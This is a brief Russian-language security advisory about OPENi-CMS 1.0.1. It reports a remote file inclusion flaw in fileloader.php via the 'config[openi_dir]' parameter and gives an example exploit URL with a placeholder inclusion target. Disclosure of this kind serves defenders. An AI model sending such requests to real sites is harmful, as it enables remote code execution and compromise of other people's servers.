Программа: OPENi-CMS 1.0.1 

Обнаруженная уязвимость позволяет скомпрометировать уязвимую систему.
Сценарий openi-admin/base/fileloader.php недостаточно проверяет параметр "config[openi_dir]" перед включением файлов. В результате можно включить и выполнить произвольный PHP код с внутренних или внешних источников. 

Пример:

http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии